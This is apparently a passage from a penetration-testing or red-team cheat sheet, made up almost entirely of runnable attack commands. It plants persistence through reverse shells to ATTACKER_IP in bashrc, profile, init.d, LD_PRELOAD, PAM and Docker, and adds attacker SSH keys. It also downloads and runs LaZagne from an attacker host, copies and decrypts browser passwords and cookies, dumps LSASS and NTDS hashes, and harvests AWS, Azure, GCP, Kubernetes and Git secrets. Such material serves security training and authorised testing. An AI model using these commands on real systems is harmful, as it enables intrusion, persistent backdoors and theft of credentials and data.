# === RC.LOCAL (LEGACY) ===

# Add to rc.local
echo "/bin/bash /tmp/payload.sh &" | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local

# === BASHRC/PROFILE ===

# User bashrc
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' >> ~/.bashrc
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' >> ~/.bash_profile

# System-wide profile
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' | sudo tee -a /etc/profile
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' | sudo tee -a /etc/bash.bashrc

# With conditional execution
echo 'if [ -z "$REVERSE_SHELL_LOADED" ]; then export REVERSE_SHELL_LOADED=1; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 & fi' >> ~/.bashrc

# === SSH KEYS ===

# Add SSH key to authorized_keys
mkdir -p ~/.ssh
echo 'ssh-ed25519 AAAAC3... attacker@kali' >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

# Root SSH key
sudo mkdir -p /root/.ssh
echo 'ssh-ed25519 AAAAC3... attacker@kali' | sudo tee -a /root/.ssh/authorized_keys
sudo chmod 600 /root/.ssh/authorized_keys

# === MOTD (MESSAGE OF THE DAY) ===

# Update scripts (executed on SSH login)
echo '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' | sudo tee /etc/update-motd.d/99-backdoor
sudo chmod +x /etc/update-motd.d/99-backdoor

# === PAM BACKDOOR ===

# Add PAM module
echo 'session optional pam_exec.so /tmp/payload.sh' | sudo tee -a /etc/pam.d/sshd

# === LD_PRELOAD ===

# Malicious shared library
cat > /tmp/evil.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void init() {
    unsetenv("LD_PRELOAD");
    if (fork() == 0) {
        system("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &");
    }
}
EOF

gcc -fPIC -shared -o /tmp/evil.so /tmp/evil.c -nostartfiles
echo "/tmp/evil.so" | sudo tee -a /etc/ld.so.preload

# === PYTHON SITE-PACKAGES ===

# Startup script
sudo tee /usr/lib/python3/dist-packages/sitecustomize.py << 'EOF'
import subprocess
try:
    subprocess.Popen(['bash', '-c', 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &'])
except:
    pass
EOF

# === INIT.D (SYSV INIT) ===

# Init script
sudo tee /etc/init.d/backdoor << 'EOF'
#!/bin/bash
### BEGIN INIT INFO
# Provides:          backdoor
# Required-Start:    $network
# Required-Stop:     $network
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Backdoor Service
### END INIT INFO

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &
EOF

sudo chmod +x /etc/init.d/backdoor
sudo update-rc.d backdoor defaults

# === DOCKER CONTAINER ===

# Persistent docker container
sudo docker run -d --restart always --name updater alpine sh -c 'while true; do nc ATTACKER_IP 4444 -e /bin/sh; sleep 60; done'

# === KERNEL MODULE ===

# Create kernel module (advanced)
# Requires kernel headers
cat > rootkit.c << 'EOF'
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>

MODULE_LICENSE("GPL");

static int __init rootkit_init(void) {
    printk(KERN_INFO "Module loaded\n");
    return 0;
}

static void __exit rootkit_exit(void) {
    printk(KERN_INFO "Module unloaded\n");
}

module_init(rootkit_init);
module_exit(rootkit_exit);
EOF

# Compile and load
make
sudo insmod rootkit.ko
echo "rootkit" | sudo tee -a /etc/modules

Data Exfiltration
#

Browser Data Extraction
#

# === CHROME DATA EXTRACTION ===

# Chrome passwords database
$ChromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default"
Copy-Item "$ChromePath\Login Data" "C:\Temp\chrome_passwords.db" -Force

# Chrome cookies
Copy-Item "$ChromePath\Cookies" "C:\Temp\chrome_cookies.db" -Force
Copy-Item "$ChromePath\Network\Cookies" "C:\Temp\chrome_network_cookies.db" -Force

# Chrome history
Copy-Item "$ChromePath\History" "C:\Temp\chrome_history.db" -Force

# Chrome bookmarks
Copy-Item "$ChromePath\Bookmarks" "C:\Temp\chrome_bookmarks.json" -Force

# Chrome credit cards
Copy-Item "$ChromePath\Web Data" "C:\Temp\chrome_webdata.db" -Force

# Chrome session data
Copy-Item "$ChromePath\Current Session" "C:\Temp\chrome_session" -Force
Copy-Item "$ChromePath\Current Tabs" "C:\Temp\chrome_tabs" -Force

# All Chrome profiles
Get-ChildItem "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data" -Directory | ForEach-Object {
    $profile = $_.Name
    if (Test-Path "$($_.FullName)\Login Data") {
        Copy-Item "$($_.FullName)\Login Data" "C:\Temp\chrome_${profile}_passwords.db" -Force
    }
}

# === FIREFOX DATA EXTRACTION ===

# Firefox profile path
$FirefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles"

# Copy all Firefox data
Get-ChildItem $FirefoxPath -Directory | ForEach-Object {
    $profile = $_.Name
    
    # Passwords
    if (Test-Path "$($_.FullName)\logins.json") {
        Copy-Item "$($_.FullName)\logins.json" "C:\Temp\firefox_${profile}_logins.json" -Force
    }
    
    # Key database
    if (Test-Path "$($_.FullName)\key4.db") {
        Copy-Item "$($_.FullName)\key4.db" "C:\Temp\firefox_${profile}_key4.db" -Force
    }
    
    # Cookies
    if (Test-Path "$($_.FullName)\cookies.sqlite") {
        Copy-Item "$($_.FullName)\cookies.sqlite" "C:\Temp\firefox_${profile}_cookies.db" -Force
    }
    
    # History
    if (Test-Path "$($_.FullName)\places.sqlite") {
        Copy-Item "$($_.FullName)\places.sqlite" "C:\Temp\firefox_${profile}_history.db" -Force
    }
    
    # Bookmarks (same as history in places.sqlite)
    # Form history
    if (Test-Path "$($_.FullName)\formhistory.sqlite") {
        Copy-Item "$($_.FullName)\formhistory.sqlite" "C:\Temp\firefox_${profile}_forms.db" -Force
    }
}

# === EDGE (CHROMIUM) DATA EXTRACTION ===

$EdgePath = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default"
Copy-Item "$EdgePath\Login Data" "C:\Temp\edge_passwords.db" -Force
Copy-Item "$EdgePath\Cookies" "C:\Temp\edge_cookies.db" -Force
Copy-Item "$EdgePath\History" "C:\Temp\edge_history.db" -Force
Copy-Item "$EdgePath\Web Data" "C:\Temp\edge_webdata.db" -Force

# === BRAVE BROWSER ===

$BravePath = "$env:USERPROFILE\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default"
if (Test-Path $BravePath) {
    Copy-Item "$BravePath\Login Data" "C:\Temp\brave_passwords.db" -Force
    Copy-Item "$BravePath\Cookies" "C:\Temp\brave_cookies.db" -Force
}

# === OPERA ===

$OperaPath = "$env:APPDATA\Opera Software\Opera Stable"
if (Test-Path $OperaPath) {
    Copy-Item "$OperaPath\Login Data" "C:\Temp\opera_passwords.db" -Force
    Copy-Item "$OperaPath\Cookies" "C:\Temp\opera_cookies.db" -Force
}

# === BROWSER DATA WITH LAZAGNE ===

# Download and run LaZagne
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/laZagne.exe')
.\laZagne.exe browsers -oN
.\laZagne.exe all -oN  # Extract all credentials

# Output to JSON
.\laZagne.exe all -oJ -output C:\Temp\

# === DECRYPT CHROME PASSWORDS (POWERSHELL) ===

Add-Type -AssemblyName System.Security
$ChromeDB = "C:\Temp\chrome_passwords.db"
$conn = New-Object System.Data.SQLite.SQLiteConnection("Data Source=$ChromeDB")
$conn.Open()
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT origin_url, username_value, password_value FROM logins"
$reader = $cmd.ExecuteReader()

while ($reader.Read()) {
    $url = $reader["origin_url"]
    $username = $reader["username_value"]
    $encrypted = [byte[]]$reader["password_value"]
    
    # Decrypt using DPAPI
    try {
        $decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        $password = [System.Text.Encoding]::UTF8.GetString($decrypted)
        Write-Output "$url | $username | $password"
    } catch {}
}
$conn.Close()

# === LINUX BROWSER DATA ===

# Chrome on Linux
cp ~/.config/google-chrome/Default/Login\ Data /tmp/chrome_passwords.db
cp ~/.config/google-chrome/Default/Cookies /tmp/chrome_cookies.db
cp ~/.config/google-chrome/Default/History /tmp/chrome_history.db

# Firefox on Linux
cp ~/.mozilla/firefox/*.default-release/logins.json /tmp/firefox_logins.json
cp ~/.mozilla/firefox/*.default-release/key4.db /tmp/firefox_key4.db
cp ~/.mozilla/firefox/*.default-release/cookies.sqlite /tmp/firefox_cookies.db
cp ~/.mozilla/firefox/*.default-release/places.sqlite /tmp/firefox_history.db

Database Extraction
#

# === MYSQL/MARIADB ===

# Dump all databases
mysqldump -u root -p --all-databases > all_databases.sql
mysqldump -u root -p --all-databases --single-transaction --quick --lock-tables=false > all_databases.sql

# Dump specific database
mysqldump -u root -p database_name > database.sql

# Dump with extended insert (larger files, faster restore)
mysqldump -u root -p database_name --extended-insert > database.sql

# Dump structure only
mysqldump -u root -p database_name --no-data > structure.sql

# Dump data only
mysqldump -u root -p database_name --no-create-info > data.sql

# Dump specific tables
mysqldump -u root -p database_name table1 table2 > tables.sql

# Dump with compression
mysqldump -u root -p database_name | gzip > database.sql.gz

# Remote MySQL dump
mysqldump -h REMOTE_HOST -u user -p database_name > database.sql

# Export to CSV
mysql -u root -p -e "SELECT * FROM database.table INTO OUTFILE '/tmp/table.csv' FIELDS TERMINATED BY ',' ENCLOSED BY '\"' LINES TERMINATED BY '\n';"

# === POSTGRESQL ===

# Dump all databases
pg_dumpall -U postgres > all_databases.sql

# Dump specific database
pg_dump -U postgres database_name > database.sql

# Dump with compression
pg_dump -U postgres database_name | gzip > database.sql.gz

# Custom format (compressed by default)
pg_dump -U postgres -Fc database_name > database.dump

# Directory format (parallel dump)
pg_dump -U postgres -Fd database_name -f database_dump/ -j 4

# Dump specific schema
pg_dump -U postgres -n schema_name database_name > schema.sql

# Dump specific tables
pg_dump -U postgres -t table_name database_name > table.sql

# Plain text format with inserts
pg_dump -U postgres --column-inserts database_name > database.sql

# Export to CSV
psql -U postgres -d database_name -c "COPY table_name TO '/tmp/table.csv' WITH CSV HEADER"

# === MSSQL ===

# Backup database (SQL Server)
sqlcmd -S server -E -Q "BACKUP DATABASE [database] TO DISK = 'C:\Temp\database.bak'"

# With authentication
sqlcmd -S server -U sa -P password -Q "BACKUP DATABASE [database] TO DISK = 'C:\Temp\database.bak'"

# Script out database
sqlcmd -S server -E -Q "SELECT * FROM sys.tables" -o tables.txt

# Export to CSV
sqlcmd -S server -E -Q "SELECT * FROM database.dbo.table" -o output.csv -s"," -w 999

# PowerShell SQL backup
Invoke-Sqlcmd -ServerInstance "server" -Query "BACKUP DATABASE [database] TO DISK = 'C:\Temp\database.bak'"

# === SQLITE ===

# Dump entire database
sqlite3 database.db .dump > database.sql

# Dump specific table
sqlite3 database.db ".dump table_name" > table.sql

# Export to CSV
sqlite3 database.db <<EOF
.headers on
.mode csv
.output table.csv
SELECT * FROM table_name;
.quit
EOF

# Copy database file
cp database.db /tmp/database_backup.db

# === MONGODB ===

# Dump entire MongoDB
mongodump --out /tmp/mongodb_backup/

# Dump specific database
mongodump --db database_name --out /tmp/mongodb_backup/

# Dump specific collection
mongodump --db database_name --collection collection_name --out /tmp/mongodb_backup/

# With authentication
mongodump --username user --password pass --authenticationDatabase admin --out /tmp/mongodb_backup/

# Dump to archive
mongodump --archive=/tmp/database.archive --gzip

# Export to JSON
mongoexport --db database_name --collection collection_name --out /tmp/collection.json

# === REDIS ===

# Dump Redis data
redis-cli SAVE
cp /var/lib/redis/dump.rdb /tmp/redis_backup.rdb

# Export all keys
redis-cli --scan | while read key; do
    echo "Key: $key"
    redis-cli GET "$key"
done > /tmp/redis_dump.txt

# === ORACLE ===

# Data Pump export
expdp username/password@database DIRECTORY=dump_dir DUMPFILE=export.dmp LOGFILE=export.log

# Traditional export
exp username/password@database FILE=export.dmp LOG=export.log FULL=y

# === ELASTICSEARCH ===

# Snapshot entire cluster
curl -X PUT "localhost:9200/_snapshot/backup/snapshot_1?wait_for_completion=true"

# Export specific index
elasticdump --input=http://localhost:9200/index_name --output=/tmp/index.json

# === CASSANDRA ===

# Snapshot keyspace
nodetool snapshot keyspace_name

# Export to CSV
cqlsh -e "COPY keyspace.table TO '/tmp/table.csv' WITH HEADER = TRUE"

Memory Dump Analysis
#

# === WINDOWS MEMORY DUMP ===

# Using Sysinternals ProcDump
procdump.exe -ma lsass.exe lsass.dmp

# Dump specific process
procdump.exe -ma <PID> process.dmp

# Using Task Manager (GUI)
# Right-click process → Create dump file

# Using comsvcs.dll (built-in)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# PowerShell LSASS dump
$proc = Get-Process lsass
$dumpFile = "C:\Temp\lsass_$($proc.Id).dmp"
.\procdump64.exe -accepteula -ma $proc.Id $dumpFile

# === LINUX MEMORY DUMP ===

# Dump process memory
gcore <PID>
gcore -o output_file <PID>

# Dump all memory
dd if=/dev/mem of=/tmp/memory.dump bs=1M
cat /proc/kcore > /tmp/memory.dump

# Using LiME (Linux Memory Extractor)
sudo insmod lime-$(uname -r).ko "path=/tmp/memory.lime format=lime"

# Dump specific process memory
cat /proc/<PID>/maps
cat /proc/<PID>/mem > /tmp/process_memory.dump

# === VOLATILITY ANALYSIS (WINDOWS) ===

# Identify image info
volatility -f memory.dmp imageinfo

# List processes
volatility -f memory.dmp --profile=Win10x64 pslist
volatility -f memory.dmp --profile=Win10x64 psscan
volatility -f memory.dmp --profile=Win10x64 pstree

# Dump hashes
volatility -f memory.dmp --profile=Win10x64 hashdump
volatility -f memory.dmp --profile=Win10x64 lsadump

# Extract cached credentials
volatility -f memory.dmp --profile=Win10x64 cachedump

# Dump LSASS
volatility -f memory.dmp --profile=Win10x64 mimikatz

# Network connections
volatility -f memory.dmp --profile=Win10x64 netscan
volatility -f memory.dmp --profile=Win10x64 connections

# Command history
volatility -f memory.dmp --profile=Win10x64 cmdscan
volatility -f memory.dmp --profile=Win10x64 consoles

# Registry hives
volatility -f memory.dmp --profile=Win10x64 hivelist
volatility -f memory.dmp --profile=Win10x64 printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"

# File extraction
volatility -f memory.dmp --profile=Win10x64 filescan | grep -i "interesting.txt"
volatility -f memory.dmp --profile=Win10x64 dumpfiles -Q 0xfffffa8001234567 -D output/

# === VOLATILITY ANALYSIS (LINUX) ===

# List processes
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_pslist
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_pstree

# Bash history
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_bash

# Network connections
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_netstat

# Loaded kernel modules
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_lsmod

# Environment variables
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_psenv

# === MIMIKATZ FROM MEMORY DUMP ===

# Using Mimikatz on dump file
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

# === PYPYKATZ (PYTHON MIMIKATZ) ===

# Parse LSASS dump
pypykatz lsa minidump lsass.dmp

# Output to JSON
pypykatz lsa minidump lsass.dmp -o output.json

# Parse all
pypykatz lsa minidump lsass.dmp --json > credentials.json

Credential Harvesting
#

# === WINDOWS CREDENTIAL MANAGER ===

# List stored credentials
cmdkey /list

# Export credentials (requires DPAPI decryption)
$creds = Get-Content "$env:USERPROFILE\AppData\Local\Microsoft\Credentials\*" -Raw
$creds | Out-File C:\Temp\credentials.txt

# PowerShell Credential Manager
Get-StoredCredential | ForEach-Object {
    "$($_.UserName) : $($_.Password)"
}

# === WINDOWS VAULT ===

# List vault items
vaultcmd /list
vaultcmd /listcreds:"Windows Credentials"

# PowerShell vault extraction
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | ForEach-Object {
    $_.RetrievePassword()
    "Resource: $($_.Resource) | UserName: $($_.UserName) | Password: $($_.Password)"
}

# === SAVED WIFI PASSWORDS ===

# List profiles
netsh wlan show profiles

# Export specific profile
netsh wlan show profile name="SSID" key=clear

# Export all WiFi passwords
(netsh wlan show profiles) | Select-String "\:(.+)$" | ForEach-Object {
    $name = $_.Matches.Groups[1].Value.Trim()
    (netsh wlan show profile name=$name key=clear) | Select-String "Key Content\W+\:(.+)$" | ForEach-Object {
        $pass = $_.Matches.Groups[1].Value.Trim()
        "$name : $pass"
    }
} | Out-File C:\Temp\wifi_passwords.txt

# === WINDOWS REGISTRY SECRETS ===

# Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /s

# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

# === SAM AND SYSTEM HIVES ===

# Copy SAM and SYSTEM
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive

# Extract with secretsdump
impacket-secretsdump -sam sam.hive -system system.hive LOCAL

# === NTDS.DIT EXTRACTION ===

# Using ntdsutil (requires DA privileges)
ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\ntds" quit quit

# Copy NTDS.dit using VSS
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM

# Extract hashes
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

# === LINUX CREDENTIAL FILES ===

# Shadow file
sudo cat /etc/shadow > /tmp/shadow.txt

# Passwd file
cat /etc/passwd > /tmp/passwd.txt

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_ed25519" 2>/dev/null
find /home -name "authorized_keys" 2>/dev/null

# Copy all SSH keys
find /home -name "id_*" -exec cp {} /tmp/ \; 2>/dev/null
find /root/.ssh -type f -exec cp {} /tmp/ \; 2>/dev/null

# Bash history (passwords in commands)
find /home -name ".bash_history" -exec grep -i "pass\|pwd\|password" {} \; 2>/dev/null

# Configuration files with passwords
grep -r "password\|pass\|pwd" /etc/ 2>/dev/null
grep -r "mysql.*password" /var/www/ 2>/dev/null

# Database config files
cat /var/www/html/wp-config.php 2>/dev/null
cat /var/www/html/config.php 2>/dev/null

# === APPLICATION CREDENTIALS ===

# FileZilla
copy "$env:APPDATA\FileZilla\recentservers.xml" C:\Temp\
copy "$env:APPDATA\FileZilla\sitemanager.xml" C:\Temp\

# WinSCP
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s > C:\Temp\winscp.txt

# RDP saved credentials
cmdkey /list | findstr "TERMSRV"

# Outlook
copy "$env:APPDATA\Microsoft\Outlook\*.pst" C:\Temp\

# KeePass
Get-ChildItem -Path C:\ -Filter "*.kdbx" -Recurse -ErrorAction SilentlyContinue

# 1Password
copy "$env:LOCALAPPDATA\1Password\data" C:\Temp\ -Recurse

# LastPass
copy "$env:LOCALAPPDATA\LastPass" C:\Temp\ -Recurse

Cloud Credentials
#

# === AWS CREDENTIALS ===

# AWS credentials file
cat ~/.aws/credentials
cat ~/.aws/config

# Windows
type %USERPROFILE%\.aws\credentials
type %USERPROFILE%\.aws\config

# EC2 instance metadata
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

# IMDSv2
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Environment variables
echo $AWS_ACCESS_KEY_ID
echo $AWS_SECRET_ACCESS_KEY
echo $AWS_SESSION_TOKEN

# === AZURE CREDENTIALS ===

# Azure credentials file
cat ~/.azure/credentials
cat ~/.azure/config

# Azure VM metadata
curl -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get access token
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Azure DevOps PAT
cat ~/.azure-devops/pat.txt

# === GCP CREDENTIALS ===

# GCP credentials
cat ~/.config/gcloud/credentials.db
cat ~/.config/gcloud/application_default_credentials.json

# GCE metadata
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"

# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

# Service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"

# === DOCKER CREDENTIALS ===

# Docker config
cat ~/.docker/config.json

# Windows
type %USERPROFILE%\.docker\config.json

# Docker secrets (if mounted)
ls /run/secrets/
cat /run/secrets/*

# === KUBERNETES SECRETS ===

# Kubeconfig
cat ~/.kube/config

# Service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Extract all secrets from cluster
kubectl get secrets --all-namespaces -o json > /tmp/k8s_secrets.json

# === TERRAFORM SECRETS ===

# Terraform state files (often contain credentials)
find . -name "terraform.tfstate" -exec cat {} \;
find . -name "*.tfstate" -exec grep -i "password\|secret\|token" {} \;

# === ANSIBLE VAULT ===

# Ansible vault files
find . -name "vault.yml"
find . -name "*vault*"

# If password known
ansible-vault decrypt vault.yml --output=/tmp/decrypted.yml

# === GIT CREDENTIALS ===

# Git credentials
cat ~/.git-credentials
cat ~/.gitconfig

# Git credential cache
git config --get credential.helper

# Search for secrets in git history
git log --all --full-history --source --find-object=$(git hash-object file.txt)